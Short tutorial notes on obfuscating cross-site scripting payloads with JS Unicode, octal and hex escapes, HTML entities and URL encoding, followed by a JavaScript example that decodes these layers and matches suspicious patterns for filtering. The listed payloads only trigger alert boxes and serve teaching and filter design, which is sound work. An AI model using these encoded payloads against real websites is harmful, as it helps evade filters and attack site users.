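I. Distinguishing JS encoding from HTML encoding:
HTML entities can be written in decimal or hexadecimal; JavaScript strings can be encoded with Unicode, octal, or hexadecimal escapes.
II. Distinguishing the encoding principles:
III. Encoded vs. unencoded
JS encoding: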
1. <script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u002f\u0078\u0073\u0073\u002f\u0029");</script> (JS Unicode encoding)
2. <script>eval("\141\154\145\162\164\50\57\170\163\163\57\51");</script> (JS octal encoding)
3. <script>eval("\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29");</script> (JS hexadecimal encoding)
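HTML encoding:
1. <img src=1 onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"> (HTML entity decimal encoding)
2. <img src=1 onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x78;&#x73;&#x73;&#x2f;&#x29;"> (HTML entity hexadecimal encoding)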
URL encoding:
1. %3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E
2. %3Cimg%20src%3D1%20onerror%3Dalert(%2Fxss%2F)%3E
3. %3Ca%20href%3D'javascript%3Aalert(%2Fxss%2F)'%3Eclick%20me%3C%2Fa%3E
Unencoded:
1. <script>alert(/xss/)</script>
2. <img src=1 onerror=alert(/xss/)>
3. <a href='javascript:alert(/xss/)'>click me</a>
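
Seen from the filtering side, every encoded form listed above decodes back to one of the unencoded strings, so a filter has to canonicalise input before it matches anything. The following is an added example, not part of the original notes: the names normalize, isSuspicious and SUSPICIOUS are illustrative, and the fixed decode order with a bounded number of rounds is a simplifying assumption.

```javascript
// Added example: canonicalise input before matching (names are illustrative).

// Layer 1: URL percent-encoding. Malformed sequences are left as-is.
function decodeUrl(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Guard: String.fromCodePoint throws above U+10FFFF, so keep the raw text.
function fromCp(n, raw) {
  return n <= 0x10ffff ? String.fromCodePoint(n) : raw;
}

// Layer 2: numeric HTML entities, hexadecimal (&#x61;) then decimal (&#97;).
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (m, h) => fromCp(parseInt(h, 16), m))
    .replace(/&#([0-9]{1,7});?/g, (m, d) => fromCp(parseInt(d, 10), m));
}

// Layer 3: JS string escapes: \u0061, \x61 and octal \141 (max \377).
function decodeJsEscapes(s) {
  const ch = (digits, base) => String.fromCharCode(parseInt(digits, base));
  return s
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => ch(h, 16))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => ch(h, 16))
    .replace(/\\([0-3][0-7]{2}|[0-7]{1,2})/g, (_, o) => ch(o, 8));
}

// Repeat all layers until nothing changes, with a bound against deep nesting.
function normalize(input, maxRounds = 5) {
  let cur = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeJsEscapes(decodeHtmlEntities(decodeUrl(cur)));
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Deliberately small pattern set: script tags, on* handlers, javascript: URLs.
const SUSPICIOUS = /<script\b|\bon\w+\s*=|javascript\s*:/i;
function isSuspicious(input) {
  return SUSPICIOUS.test(normalize(input));
}

// Constructed sample: the URL-encoded <img> string from the list above.
console.log(normalize('%3Cimg%20src%3D1%20onerror%3Dalert(%2Fxss%2F)%3E'));
```

Decoding every layer regardless of context can over-decode legitimate text, so a production filter should decode only the layers that apply to the sink the value ends up in.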